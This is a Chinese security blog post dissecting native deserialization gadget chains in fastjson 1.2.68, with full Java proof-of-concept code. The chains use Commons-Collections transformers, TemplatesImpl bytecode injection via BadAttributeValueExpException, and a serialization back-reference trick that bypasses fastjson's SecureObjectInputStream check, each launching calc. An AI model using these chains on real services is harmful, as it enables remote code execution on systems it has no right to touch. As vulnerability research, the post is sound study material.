fastjson中的原生反序列化漏洞

最新推荐文章于 2025-11-26 18:56:35 发布
原创 最新推荐文章于 2025-11-26 18:56:35 发布 · 948 阅读 · 26 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#web安全

fastjson中的原生反序列化漏洞

要找fastjson中的原生反序列化漏洞,首先找支持序列化的类,以下类支持序列化(1.2.68版本):

com/alibaba/fastjson/serializer/SerializerFeature[Serializable]
com/alibaba/fastjson/asm/TypeCollector$1[Serializable]
com/alibaba/fastjson/util/AntiCollisionHashMap[Serializable]
com/alibaba/fastjson/JSONException[Serializable]
com/alibaba/fastjson/PropertyNamingStrategy[Serializable]
com/alibaba/fastjson/JSONPathException[Serializable]
com/alibaba/fastjson/JSONValidator$Type[Serializable]
com/alibaba/fastjson/parser/Feature[Serializable]
com/alibaba/fastjson/JSONPath$Operator[Serializable]
com/alibaba/fastjson/JSONArray[Serializable]
com/alibaba/fastjson/JSONObject[Serializable]

然后找这些类是否重写readObject:

com/alibaba/fastjson/util/AntiCollisionHashMap[Serializable]
com/alibaba/fastjson/JSONArray[Serializable]
com/alibaba/fastjson/JSONObject[Serializable]

接着在readObject中看是否存在某些调用,比如AntiCollisionHashMap:

image-20251105063406832

image-20251105063500516

看到hashcode基本确定可以结合CC链,以下是payload(jdk8u6+CommonsCollections3.1):

package org.example.CommonsCollections;

import com.alibaba.fastjson.util.AntiCollisionHashMap;
import org.apache.commons.collections.Transformer;
import org.apache.commons.collections.functors.ChainedTransformer;
import org.apache.commons.collections.functors.ConstantTransformer;
import org.apache.commons.collections.functors.InvokerTransformer;
import org.apache.commons.collections.keyvalue.TiedMapEntry;
import org.apache.commons.collections.map.*;
import org.example.tools.DeserializationTools;

import java.io.*;
import java.lang.reflect.*;
import java.util.HashMap;
import java.util.Map;


public class CommonsCollections {
    public static void main(String[] args) throws IllegalAccessException, IOException, NoSuchFieldException, ClassNotFoundException {
        Transformer[] transformers = new Transformer[]{
                new ConstantTransformer(Runtime.class),
                new InvokerTransformer("getMethod", new Class[]{String.class, Class[].class},
                        new Object[]{"getRuntime", new Class[0]}),
                new InvokerTransformer("invoke", new Class[]{Object.class, Object[].class},
                        new Object[]{null, new Object[0]}),
                new InvokerTransformer("exec", new Class[]{String.class},
                        new String[]{"calc.exe"})
        };

        Transformer transformerChain = new ChainedTransformer(transformers);

        Map<String, Object> innerMap = new HashMap<>();
        Map<String, Object> lazyMap = LazyMap.decorate(innerMap, transformerChain);


        TiedMapEntry entry = new TiedMapEntry(lazyMap, "test-key");
        Field field = entry.getClass().getDeclaredField("map");
        field.setAccessible(true);
        field.set(entry, new AntiCollisionHashMap());
        AntiCollisionHashMap antiCollisionHashMap = new AntiCollisionHashMap();
        antiCollisionHashMap.put(entry, 1);
        field.set(entry, lazyMap);

        String s = DeserializationTools.serializeToHex(antiCollisionHashMap);
        System.out.println(s);

        DeserializationTools.deserializeFromHex(s);

    }
}

再看JSONObject,在readObject中会调用map.entrySet():

image-20251106012538013

但是lazyMap并没有重写entrySet,那就考虑能否用其他重写了entrySet并调用了map.get方法的map来封装下lazyMap,但实际上并没有找到这样的map。

然后发现JSONObject实现了InvocationHandler,因此去看了下invoke方法:

image-20251107045044649

如果可以走到map.get,当map等于lazyMap,那不就可以了吗,但实际上即便绕过了SecureObjectInputStream的检查也做不到,因为反序列化时entrySet方法参数类型数组长度为0,name这块也对方法名做了限制。

到了这一步,其实基于lazyMap的漏洞链已经用不了了。

fastjson的反序列化机制:

fastjson使用parseObject去做反序列化时会获取指定类型的反序列化器:

image-20251107174659446

实际反序列化时会走JavaBeanDeserializer和其他Deserializer,反序列化器会与类型做一个绑定,这样才能够根据类型选择特定的反序列化器来进行反序列化。

fastjson是在ParseConfig中完成这些的:

  • initDeserializers中做反序列化器的静态绑定,是固定的映射关系
  • getDeserializer中做反序列化器的动态绑定,fastjson中内置了反序列化器,因此在动态绑定时首先根据条件绑定这些内置的反序列化器,如果没选到内置的反序列化器就使用createJavaBeanDeserializer创建反序列化器

在createJavaBeanDeserializer中又有以下几条路径去创建反序列化器:

  • 如果类存在JSONType注解,就提取其中的反序列化器类型创建反序列化器,形式如@JSONType(deserializer = xxx.class)

    image-20251107181503743

  • 如果没启用asm字节码技术就返回JavaBeanDeserializer

    image-20251107182446678

  • 最后才是通过asmFactory去创建继承自JavaBeanDeserializer的反序列化器:

    image-20251107182559540

    image-20251107184835309

JavaBeanDeserializer的组成如下:

  • 构造方法
  • deserialze:相当于readObject,用来做反序列化

上面的代码中:

  • _init:构造函数
  • _createInstance:createInstance函数,根据javaBeanInfo 创建JavaBean对象,就是根据类信息创建类对象
  • _deserialze:deserialze函数,用于反序列化
  • _deserialzeArrayMapping:deserialzeArrayMapping函数,将 JSON 数组结构映射为 JavaBean 对象

beanInfo在此构造:

image-20251107211828410

build方法写的比较复杂,比较关键的部分是构建FieldInfo(存储属性和对应的方法)的方式,以下是构建FieldInfo时涉及的两种方式:

  • 如果方法存在JSONField注解,就通过注解去new FieldInfo:从方法的JSONField注解提取属性名,然后使用属性名和方法new FieldInfo

    image-20251108013054672

    image-20251108013453141

  • 不存在SONField注解的情况下就通过以下代码去设置当前method的propertyName

    image-20251108021325045

反序列化时使用BeanInfo为字段赋值在这:

image-20251107221329941

如果字段存在set方法,那么就调用set方法赋值,否则直接对字段赋值

image-20251107221708995

fastjson的序列化机制类似,他的动态创建序列化器在这,sortedFields即存储属性和对应get、set方法的变量

image-20251107214548528

构建BeanInfo的位置在TypeUtils中的buildBeanInfo,它通过computeGetters去计算get方法:

方式同样两种,但不管怎么样,只会提取get和is开头的方法:

image-20251109002952943

前面通过方法名计算属性名,但是怎么确定属性名是对的呢,在ParserConfig中存在一个函数,序列化时用的就是这个函数:

image-20251109022316452

fieldCacheMap存储着正确的属性名与对应的Field的映射,当不能借助propertyName找到Field时,就会对propertyName做些转换后再进行查找,比如:

  • 最前面插入_后查找
  • 最前面插入m后查找
  • 首字母小写时转换为大写后查找
  • 前两个字母大写时就忽视大小写进行查找

反序列化时用的另一个函数getField:

image-20251109025002512

当没从declaredFields中找到propertyName对应的Field时,就会无视大小写进行匹配

【总结1】1.2.68版本的fastjson在创建类特定的ASM序列化器和ASM反序列化器时,构建的方法和属性的映射规则分别如下:

  • 反序列化器:
    • methodName[3]大写,propertyName=lower(methodName[3])+methodName[4:]
    • methodName[3]=‘_’,propertyName=methodName[4:]
    • methodName[3]=‘f’,propertyName=methodName[3:]
    • methodName[3]和methodName[4]都是大写,propertyName=methodName[3:]
  • 序列化器:与反序列化器基本相同,不同的是限制了方法开头为is或get

【总结2】1.2.68版本的fastjson选择反序列化器和序列化器的方式:

  • 反序列化器(所有反序列化器映射存在ParseConfig的deserializers):在ParseConfig中的getDeserializer进行选择,先根据类的类型选择已有的反序列化器,如果没有就调用createJavaBeanDeserializer去创建,在创建的时候先从JSONType注解去创建,没JSONType注解就使用ASM动态创建以JavaBeanDeserializer为父类的反序列化器
  • 序列化器(所有序列化器映射存在SerializeConfig的serializers):在SerializeConfig中的getObjectWriter进行选择,先根据类的类型选择已有的序列化器,如果没有就调用createJavaBeanSerializer去动态创建序列化器,要么根据JSONType注解去创建,要么使用ASM动态创建以JavaBeanSerializer为父类的序列化器

使用JavaBeanSerializer序列化器在序列化时会自动调用get方法,使用JavaBeanDeserializer反序列化时会自动调用set方法,因为他们都使用FieldInfo的get或set方法获取或设置属性值,method即属性对应的set或get方法:

image-20251109011827061

使用JavaBeanSerializer序列化时会调用属性的get方法,使用JavaBeanDeserializer反序列化时会调用属性的set方法,由于存在方法调用,如果方法是恶意方法,那么就可以触发漏洞,基于此开始找类来构造利用链了,类的要求为:
  • 类支持序列化
  • 序列化类时需要创建对应的asm序列化器
  • 类存在属性和方法的映射,这个映射必须可以在fastjson中构造,即能够使用计算出的属性名找到特定的方法
  • 方法存在危险调用

TemplatesImp满足这些要求:

  • 支持序列化
  • 能够走到创建asm序列化器
  • _outputProperties字段在fastjson序列化中可以映射到getOutputProperties
  • getOutputProperties中存在危险调用

fastjson中的序列化依靠ObjectSerializer.write的实现完成,找到fastjson的序列化函数去序列化恶意TemplatesImp对象,比如toJSON:

package org.example.deserialization;
import com.alibaba.fastjson.JSON;
import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet;
import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl;
import javassist.CannotCompileException;
import javassist.ClassPool;
import javassist.CtClass;
import javassist.NotFoundException;
import org.example.tools.ReflectionUtils;

import java.io.IOException;

public class fastjsonDemo {
    public static void main(String[] args) throws CannotCompileException, NotFoundException, IOException {
        TemplatesImpl templatesImp = new TemplatesImpl();

        ClassPool pool = ClassPool.getDefault();

        CtClass cc = pool.makeClass("EvilClass" + System.nanoTime());

        String cmd = "java.lang.Runtime.getRuntime().exec(\"calc\");";

        cc.makeClassInitializer().insertBefore(cmd);

        cc.setSuperclass(pool.get(AbstractTranslet.class.getName()));

        byte[] evilCode = cc.toBytecode();

        ReflectionUtils.setFieldValue(templatesImp, "_bytecodes", new byte[][]{evilCode});
        ReflectionUtils.setFieldValue(templatesImp, "_name", "test");
        ReflectionUtils.setFieldValue(templatesImp, "_tfactory", new TransformerFactoryImpl());

        JSON.toJSON(templatesImp);
        //JSON.toJSONString(templatesImp);

    }
}

成功触发计算器,接着要进一步构造链,找到一个类,要求在反序列化时能够直接或间接调用toJSON或toJSONString,在深度为2时,当前环境下只找到一条符合条件的被调用链:

被调用链 #347(节点数:3) ---
    类模块:非本地模块
    com.alibaba.fastjson.JSON.toJSONString(-1)
        类模块:非本地模块
        com.alibaba.fastjson.JSON.toString(com.alibaba.fastjson.JSON.class:967)
            类模块:非本地模块
            类特性:[Serializable][public]
            javax.management.BadAttributeValueExpException.readObject(.javax.management.BadAttributeValueExpException.class:86)

于是进一步构造:

package org.example.deserialization;
import com.alibaba.fastjson.JSONArray;
import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet;
import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl;
import javassist.CannotCompileException;
import javassist.ClassPool;
import javassist.CtClass;
import javassist.NotFoundException;
import org.example.tools.DeserializationTools;
import org.example.tools.ReflectionUtils;

import javax.management.BadAttributeValueExpException;
import java.io.IOException;

public class fastjsonDemo {
    public static void main(String[] args) throws CannotCompileException, NotFoundException, IOException, ClassNotFoundException {
        TemplatesImpl templatesImp = new TemplatesImpl();

        ClassPool pool = ClassPool.getDefault();

        CtClass cc = pool.makeClass("EvilClass" + System.nanoTime());

        String cmd = "java.lang.Runtime.getRuntime().exec(\"calc\");";

        cc.makeClassInitializer().insertBefore(cmd);

        cc.setSuperclass(pool.get(AbstractTranslet.class.getName()));

        byte[] evilCode = cc.toBytecode();

        ReflectionUtils.setFieldValue(templatesImp, "_bytecodes", new byte[][]{evilCode});
        ReflectionUtils.setFieldValue(templatesImp, "_name", "test");
        ReflectionUtils.setFieldValue(templatesImp, "_tfactory", new TransformerFactoryImpl());

//        JSON.toJSON(templatesImp);
//        JSON.toJSONString(templatesImp);


        JSONArray jsonArray = new JSONArray();
        jsonArray.add(templatesImp);
        BadAttributeValueExpException badExp = new BadAttributeValueExpException(null);

        ReflectionUtils.setFieldValue(badExp, "val", jsonArray);
        String s = DeserializationTools.serializeToHex(badExp);
        System.out.println(s);
        DeserializationTools.deserializeFromHex(s);

    }
}

但是报错:

Exception in thread "main" com.alibaba.fastjson.JSONException: autoType is not support. com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl
	at com.alibaba.fastjson.parser.ParserConfig.checkAutoType(ParserConfig.java:1358)
	at com.alibaba.fastjson.JSONObject$SecureObjectInputStream.resolveClass(JSONObject.java:574)
	at java.io.ObjectInputStream.readNonProxyDesc(ObjectInputStream.java:1613)
	at java.io.ObjectInputStream.readClassDesc(ObjectInputStream.java:1518)
	at java.io.ObjectInputStream.readOrdinaryObject(ObjectInputStream.java:1774)
	at java.io.ObjectInputStream.readObject0(ObjectInputStream.java:1351)
	at java.io.ObjectInputStream.readObject(ObjectInputStream.java:371)
	at java.util.ArrayList.readObject(ArrayList.java:791)

是被SecureObjectInputStream.resolveClass拦截了,找了下资料(https://y4tacker.github.io/2023/04/26/year/2023/4/FastJson%E4%B8%8E%E5%8E%9F%E7%94%9F%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96-%E4%BA%8C/)发现可以借助引用绕过resolveClass检查,得到:

package org.example.deserialization;
import com.alibaba.fastjson.JSONArray;
import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet;
import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl;
import javassist.CannotCompileException;
import javassist.ClassPool;
import javassist.CtClass;
import javassist.NotFoundException;
import org.example.tools.DeserializationTools;
import org.example.tools.ReflectionUtils;

import javax.management.BadAttributeValueExpException;
import java.io.IOException;
import java.util.ArrayList;

public class fastjsonDemo {
    public static void main(String[] args) throws CannotCompileException, NotFoundException, IOException, ClassNotFoundException {
        TemplatesImpl templatesImp = new TemplatesImpl();

        ClassPool pool = ClassPool.getDefault();

        CtClass cc = pool.makeClass("EvilClass" + System.nanoTime());

        String cmd = "java.lang.Runtime.getRuntime().exec(\"calc\");";

        cc.makeClassInitializer().insertBefore(cmd);

        cc.setSuperclass(pool.get(AbstractTranslet.class.getName()));

        byte[] evilCode = cc.toBytecode();

        ReflectionUtils.setFieldValue(templatesImp, "_bytecodes", new byte[][]{evilCode});
        ReflectionUtils.setFieldValue(templatesImp, "_name", "test");
        ReflectionUtils.setFieldValue(templatesImp, "_tfactory", new TransformerFactoryImpl());

//        JSON.toJSON(templatesImp);
//        JSON.toJSONString(templatesImp);

        ArrayList<Object> list = new ArrayList<Object>();
        list.add(templatesImp);
        JSONArray jsonArray = new JSONArray();
        jsonArray.add(templatesImp);
        BadAttributeValueExpException badExp = new BadAttributeValueExpException(null);

        ReflectionUtils.setFieldValue(badExp, "val", jsonArray);
        list.add(badExp);
        String s = DeserializationTools.serializeToHex(list);
        System.out.println(s);
        DeserializationTools.deserializeFromHex(s);

    }
}

存在对象A和B,其中A是B的字段a的值,使用ArrayList按顺序存储A、B,ArrayList的序列化和反序列化过程如下:

  • 序列化A时正常写入,序列化B时先序列化其他字段,当序列化到字段a时,序列化机制会识别到 A 已被序列化过,所以不再重复写入
  • 反序列化A时根据流中 A 的完整数据创建新对象,反序列化B时,其他字段正常反序列化,当反序列化到a时,会得到一个引用标识,然后创建到前面对象的引用

因此当反序列化到badExp中的jsonArray时,反序列化的是一个引用类型对象,而引用类型是不会触发检查的

【总结3】:

在寻找fastjson的原生反序列化漏洞时可以基于以下思路:

  • 以readObject中成员的函数调用为source,以其他链的触发点(如lazyMap.get)为sink,找到的一条调用链,比如AntiCollisionHashMap与CC链结合得到的利用链
  • 以fastjson的get或set来做source到sink的中转

fastjson的原生反序列化漏洞本质上就是由于存在可以被用户控制的方法调用。

反序列化漏洞分析来分析去,关注的重点就两个:

  • 找sink(lazyMap.get这样的漏洞触发点),找source(反序列化时必然进入的入口),找中转节点
  • sink必然会实例化恶意类(加载恶意字节码)、调用恶意方法(方法名可控或能选择恶意方法)或触发其他类型的漏洞
web安全渗透测试十大常规项(一):web渗透测试之Fastjson反序列化
HACKONE的博客
06-29 565
FastJson有一个全局缓存机制:在解析json数据前会先加载相关配置,调用addBaseClassMappings()和loadClass()函数将一些基础类和第三方库存放到mappings中(mappings是ConcurrentMap类,所以我们在一次连接中传入两个键值a和b,之后在解析时,如果没有开启autotype,会从mappings或deserializers.findClass()函数中获取反序列化的对应类,如果有,则直接返回绕过了黑名单。,在经过黑白名单后,在加载类时会去掉前后的L和;
java代码审计之fastjson反序列化漏洞
CheatMyself的博客
05-30 1244
Fastjson 是一个 Java 库,可以将 Java 对象转换为 JSON 格式,当然它也可以将 JSON 字符串转换为 Java 对象。Fastjson 可以操作任何 Java 对象,即使是一些预先存在的没有源码的对象。该产品主要提供了两个接口,JSON.toJSONString和JSON.parseObject/JSON.parse分别实现序列化和反序列化
Fastjson反序列化
Bloyet
04-02 1305
学习fastjson漏洞,以及高版本绕过思路
Fastjson 结合 jdk 原生反序列化的利用手法 ( Aliyun CTF )
2401_84466359的博客
06-19 2160
2023 Aliyun CTF ezbean是一道CTF java反序列化题目。题目的目的是让选手通过一个java原生反序列化入口,最终达成RCE。本文对题目的几种解法做了具体的分析,主要分为预期解法和非预期解法两种思路。通过对Fastjson反序列化的行为分析,从两个方向攻克本题。题目的逻辑简单清晰,通过 /read 路由可以传入 data 参数进行反序列化。题目的依赖就是 springboot 和 fastjson1.2.60。if(!} else {
漏洞复现】Fastjson反序列化
网络安全知识分享
12-31 6165
Fastjson反序列化一、简介二、序列化与反序列化三、Fastjson漏洞介绍1、漏洞原理2、RMI3、JNDI4、JEP290四、编写的简单测试的环境五、漏洞版本1、fastjson<=1.2.241.1、TemplatesImpl 利用分析1.2、JNDI利用分析1.3、JNDI利用1.4、官方进行的修复2、fastjson<=1.2.413、fastjson<=1.2.424、fastjson<=1.2.455、fastjson<=1.2.476、1.2.48&lt
Java安全-FastJson反序列化分析
m0_60442621的博客
03-31 1392
Fastjson 是阿里巴巴推出的一款高性能 JSON 序列化/反序列化库,由于其便捷性被广泛应用于 Java 项目中。 Java安全-FastJson反序列化漏洞分析
用友NC-Cloud系统反序列化漏洞(Fastjson)
2401_86352963的博客
10-04 873
用友NC Cloud是用友网络科技股份有限公司推出的一款企业级云服务产品,主要面向大中型企业提供全面的云计算解决方案。用友NC-Cloud /ncchr/pm/ref/indiIssued/blobRefClassSearch接口处存在FastJson反序列漏洞。攻击者可以构造恶意的JSON数据,在服务器上执行任意代码,从而控制整个服务器系统。
JavaSec | fastjson反序列化调用分析
zgz67611的博客
05-22 994
这里来调试分析一下fastjson原生反序列化,也就是比较常打的反序列化调用
Java反序列化Fastjson基础
..
01-06 8076
最近摆烂了很久,来学习一下fastjson Fastjson 是 Alibaba 开发的 Java 语言编写的高性能 JSON 库,用于将数据在 JSON 和 Java Object 之间互相转换。提供两个主要接口来分别实现序列化和反序列化操作。JSON.toJSONString 将 Java 对象转换为 json 对象,序列化的过程。JSON.parseObject/JSON.parse 将 json 对象重新变回 Java 对象;反序列化的过程所以可以简单的把 json 理解成是一个字符串。
Javaweb安全——Fastjson反序列化利用
weixin_43610673的博客
10-13 4996
JSON.parseObject 的底层调用的还是 JSON.parse 方法,只是在 JSON.parse 的基础上做了一个封装。在JSON序列化时开启 SerializerFeature.WriteClassName 选项,序列化出来的结果会在开头加一个 @type 字段,值为进行序列化的类名。反序列化时带有@type 字段的序列化数据会得到对应类型的实例化对象。漏洞的还是Fastjson的功能,此功能可以反序列化的时候人为指定类,然后在利用指定的反序列化器过程中,如果满足条件则会去反射调用方法,以串联
Java安全原生反序列化&重写方法&条分析&触发类
2301_76227305的博客
11-27 1170
虽然今天的内容看起来有点复杂,但总结起来就一件事,想办法调用其它的readObject,而不是去调用原本的readObject。最后还是要声明一下,以上仅为个人的拙见,如何有不对的地方,欢迎各位师傅指正与补充,有兴趣的师傅可以一起交流学习。
fastjson 原生反序列化
09-22
### 原生反序列化漏洞触发示例 ```java public class ExploitClass { private String cmd; // 恶意Setter可触发RCE public void setCmd(String cmd) { Runtime.getRuntime().exec(cmd); // 漏洞点! } } // ...
fastjson反序列化-1.2.24漏洞利用与分析
2301_80127209的博客
03-19 1262
Fastjson的1.2.24版本是最先发现漏洞的版本,这篇文章也是作为学习Fastjson反序列化的开端。后续会继续学习Fastjson高版本的绕过。反序列化之路任重而道远。申明:本账号所分享内容仅用于网络安全技术讨论,切勿用于违法途径,所有渗透都需获取授权,违者后果自行承担,与本号及作者无关,请谨记守法。免费领取安全学习资料包!渗透工具技术文档、书籍面试题帮助你在面试中脱颖而出视频基础到进阶。
SpringSecurity相关jar包的介绍
2509_94006941的博客
11-26 226
Spring Security是spring采用AOP思想,基于servlet过滤器实现的安全框架。它提供了完善的认证机制和方法级的 授权功能。是一款非常优秀的权限管理框架。Spring Security主要jar包功能介绍。
2025年第二届全国网络安全行业职业技能大赛 网络安全管理员样题
Aluxian_的博客
11-22 1728
2025年全国网络安全行业职业技能大赛网络安全管理员赛项样题发布。比赛旨在测评选手在网络安全管理全流程中的核心能力,包括安全防护、管理和处置。比赛采用在线远程形式,选手需自行准备工具,通过提交Flag形式答题。赛题分为三个任务:网络及服务器维护(40%)、互联网应用安全维护(30%)和网络安全数据审查(30%),涉及iptables配置、数据备份、站点分析和流量审查等内容。比赛要求选手具备扎实的理论基础和实操能力,所有操作需符合行业规范。比赛总分100分,违规操作将取消成绩。
2025年第二届全国网络安全行业职业技能大赛—电子数据取证分析师(样题)
Aluxian_的博客
11-22 1033
2025年全国网络安全职业技能大赛电子数据取证分析师赛项样题公布。比赛要求选手完成电子数据提取与固定、数据恢复和深度分析三大任务,涵盖计算机、移动终端、物联网等多类设备取证。竞赛采用在线远程形式,选手需自行准备工具,通过提交Flag答题。样题包含三个实战任务:手机APP取证(30%)、压缩包数据恢复(30%)和网络攻击分析(40%),重点考察选手的规范操作能力和技术应用水平。比赛总分100分,涉及包名识别、交易记录恢复、攻击溯源等具体技能点。组委会提示选手注意系统访问稳定性,并禁止使用违规工具。
117页-图解重要数据处理安全要求(1).pdf
11-26
117页-图解重要数据处理安全要求(1)
基于C++与ROS的双机械臂协同控制系统:Gazebo仿真与UR10实体机器人集成开发实践
最新发布
11-26
本项目采用C++编程语言结合ROS框架构建了完整的双机械臂控制系统,实现了Gazebo仿真环境下的协同运动模拟,并完成了两台实体UR10工业机器人的联动控制。该毕业设计在答辩环节获得98分的优异成绩,所有程序代码均通过系统性调试验证,保证可直接部署运行。 系统架构包含三个核心模块:基于ROS通信架构的双臂协调控制器、Gazebo物理引擎下的动力学仿真环境、以及真实UR10机器人的硬件接口层。在仿真验证阶段,开发了双臂碰撞检测算法和轨迹规划模块,通过ROS控制包实现了末端执行器的同步轨迹跟踪。硬件集成方面,建立了基于TCP/IP协议的实时通信路,解决了双机数据同步和运动指令分发等关键技术问题。 本资源适用于自动化、机械电子、人工智能等专业方向的课程实践,可作为高年级课程设计、毕业课题的重要参考案例。系统采用模块化设计理念,控制核心与硬件接口分离架构便于功能扩展,具备工程实践能力的学习者可在现有框架基础上进行二次开发,例如集成视觉感知模块或优化运动规划算法。 项目文档详细记录了环境配置流程、参数调试方法和实验验证数据,特别说明了双机协同作业时的时序同步解决方案。所有功能模块均提供完整的API接口说明,便于使用者快速理解系统架构并进行定制化修改。 资源来源于网络分享,仅用于学习交流使用,请勿用于商业,如有侵权请联系我删除!
掌握系统变化的艺术
11-26
本书聚焦于现代软件系统中变化的常态性,提出以模型驱动和知识管理为核心的应对框架。通过元建模、可变性设计与协同追踪技术,支持系统全生命周期的持续演化。内容涵盖从需求到运维的多层级变革管理,强调跨领域协作与形式化方法的融合,为构建高适应性系统提供理论与实践指南。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值